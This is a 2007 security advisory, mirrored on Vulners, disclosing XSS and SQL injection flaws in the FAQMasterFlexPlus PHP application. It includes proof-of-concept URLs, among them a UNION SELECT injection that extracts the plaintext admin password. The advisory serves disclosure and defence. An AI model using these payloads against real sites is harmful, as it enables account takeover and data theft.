Lucene search
K

faqmaster-multi.txt

🗓️ 29 Dec 2007 00:00:00Reported by Juan Galiana LaraType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

FAQMasterFlexPlus multiple vulnerabilities in php & mysql, including XSS & SQL injection flaws, leading to admin password disclosur

Code
`- Security Advisory -  
  
  
- FAQMasterFlexPlus multiple vulnerabilities -  
---------------------------------------------------------------  
  
Product: FAQMasterFlexPlus  
Version: Latest version is affected, other not tested  
Vendor: http://www.netbizcity.com  
Affected by: Cross-Site Scripting & SQL injection  
  
  
  
  
  
I. Introduction.  
  
FaqMasterFlexPlus is a free, database-driven web-based application written  
in php for creating and maintaining  
Frequently Asked Questions (FAQs) on your web site.  
It has language support and features according documentation are: "Allow to  
create unlimited categories and unlimited  
Questions/Answers and has web-based category and FAQ administration with  
Add, Edit, Delete Capability.",  
  
It's free software, released under the GNU General Public Lisence (GPL).  
Works with php & mysql and comes bundled in some versions of Fantastico  
(Cpanel X).  
  
  
  
II. Description  
  
Multiple flaws in FaqMasterFlexPlus have been discovered:  
  
  
1) Cross Site Scripting:  
  
The script faq.php suffers an XSS bug, specifically the variable $cat_name  
it's not properly sanitized,  
an attacker exploiting this flaw can perform an XSS attack to access the  
targeted user cookies.  
  
All Admin scripts to add/edit/delete categories and add/edit/delete faq  
don't parse correctly the user supplied input too.  
  
  
PoC:  
http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS]  
  
  
  
2) SQL Injection (to exploit this issue it's necesarry magic_quotes_gpc set  
to Off in the php.ini file).  
  
All the scripts suffers for sql injections attacks in the querys to the  
database.  
  
PoC:  
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*  
  
  
Then get a new line like this:  
  
Q faquser@localhost  
  
  
or a Proof of Concept to get the admin password:  
  
  
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin  
  
  
  
Q supersecretpassword  
  
  
bingo! ;)  
  
  
  
Besides password is stored in plain text, this is a big security flaw.  
  
  
  
This software is infected with many bugs and must be fully audited for  
enforce the security.  
  
  
  
  
III. Timeline  
  
08/05/2007 - Bugs discovered  
10/05/2007 - Vendor Contact (No Response)  
12/12/2007 - Vendor Contacted Again (No Response)  
28/12/2007 - Advisory Disclosure  
  
  
  
IV. Credits  
  
Juan Galiana <jgaliana gmail com>  
  
  
Regards  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation